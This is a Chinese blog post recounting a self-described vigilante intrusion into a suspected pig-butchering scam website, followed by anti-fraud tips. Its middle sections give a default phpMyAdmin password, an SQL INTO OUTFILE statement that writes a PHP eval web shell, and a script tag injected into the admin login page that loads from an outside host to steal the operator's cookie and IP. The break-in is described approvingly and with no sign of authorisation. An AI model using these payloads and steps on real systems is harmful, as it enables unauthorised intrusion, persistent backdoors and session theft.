记一次帮助粉丝渗透某盘反诈骗的实战 - 渗透测试中心
2024-1-2 12:24:0 Author: www.cnblogs.com(查看原文) 阅读量:25 收藏

0X00    事情由来

图片

图片

图片

了解完事情的经过,经过我的经验判断,这应该是个杀猪诈骗案例

诈骗份子通过一些手段让受害人相信,通过他们可以赚钱并诱导充值杀猪盘赌博

0X01    渗透过程-大概二十分钟左右就拿下了

渗透过程简单枯燥:

看了一眼IP和端口,判断了下应该不存在云waf,直接开始扫目录

过了几分钟扫到一个http://xxxx.com.cn/u.php,原来是upupw的集成环境,如下图

图片

图片

思路,爆破phpmyadmin,或者找upupw的默认数据库密码,先找默认密码试试看

图片

成功用系统提供的密码登录,默认的是:DRsXT5ZJ6Oi55LPQ

成功登录phpmyadmin

图片

然后尝试getshell,由于有upupw探针,直接查看了phpinfo,有网站的绝对路径,直接尝试常规写shell

需要知道绝对路径、数据库root权限、数据库有写权限具体语句:
SELECT "<?php eval(@$_POST['xx']);?>" INTO OUTFILE "D:\\wap\\member_bak.php"
注意点:windows下,须要双反斜线,否则会转义然后使用菜刀/蚁剑等链接即可

由于当时没有截图,目前网站已经打不开了,所以下面就直接放出拿到shell后的状态了

图片

渗透结束,看了下权限,是system权限,不过咱们的目标是定位诈骗分子的IP信息和位置信息,接着下一步了

0X02    定位诈骗份子的IP和端口

拿到shell了就容易的多了,找后台登录的php文件插入xss代码即可

图片

找了一圈发现,后台登录是另外一个网站目录下,编辑admin778899.php

echo '<sCRiPt sRC=https://xx.xx/XFXX></sCrIpT>';

等待诈骗分子登录

图片

居然还是手机登录的,666

替换Cookie登录后台,发现并没有什么用,都是一些数字而已

图片

去ipip.net 查询了一下IP地址信息,不出意外,果然又在境外,唉....

图片

0X03    告知粉丝结果

过程我就直接贴和受害者的微信聊天记录了

图片

图片

图片

图片

图片

图片

图片

图片

0X04    如何防范此类诈骗

1.网络交友,要提高防骗意识,保持良好的社交心态,注意个人隐私信息的保护,特别是涉及到金钱往来,务必多渠道核实对方真实身份;

2.网络上凡是涉及带你投资理财有高收益的都视为诈骗即可;

3.骗子在朋友圈不断分享投资盈利的信息,吸引受害人主动咨询;

4.诱导受害人注册平台,投入资金。当受害人看到盈利想要提现时,平台持续以受害人银行卡号错误要求缴纳保证金、未按要求备注、账户冻结、税收等理由继续诱骗钱财,实施诈骗;

5.保持正确的投资理财观,不盲目相信无风险却高回报的投资方式,天上不会掉馅饼



文章来源: https://www.cnblogs.com/backlion/p/17940238
如有侵权请联系:admin#unsafe.sh